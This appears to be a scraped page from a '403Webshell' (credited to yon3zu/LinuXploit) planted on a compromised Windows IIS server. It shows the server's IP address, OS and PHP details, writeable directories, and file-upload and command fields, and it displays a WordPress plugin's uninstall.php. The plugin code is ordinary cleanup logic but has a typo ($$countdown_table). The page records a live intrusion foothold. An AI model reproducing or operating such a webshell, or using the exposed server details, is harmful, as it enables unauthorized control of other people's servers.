403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/KnowledgeBase/wp-content/plugins/kadence-blocks-pro/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/KnowledgeBase/wp-content/plugins/kadence-blocks-pro//uninstall.php
<?php
/**
 * Uninstall Kadence Blocks Pro
 */

// Exit if accessed directly.
if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) exit;

wp_clear_scheduled_hook( 'kadence_countdown_daily_cleanup' );

if ( apply_filters( 'kadence_blocks_pro_remove_data_uninstall', false ) ) {

	// Load kbp file.
	include_once 'kadence-blocks-pro.php';
	if ( class_exists( 'Kadence_Blocks_Pro' ) ) {
		// This is kind of stupid but it ensures that the capabilities file (class used below) gets loaded.
		Kadence_Blocks_Pro::instance( dirname( __FILE__ ) . '/kadence-blocks-pro.php' );
	}
	$entries_table = new \KBP\Tables\Entries();
	if ( $entries_table->exists() ) {
		$entries_table->uninstall();
	}
	$entries_meta_table = new \KBP\Tables\Entries_Meta();
	if ( $entries_meta_table->exists() ) {
		$entries_meta_table->uninstall();
	}
	$countdown_table = new \KBP\Tables\Countdown_Entries();
	if ( $$countdown_table->exists() ) {
		$countdown_table->uninstall();
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit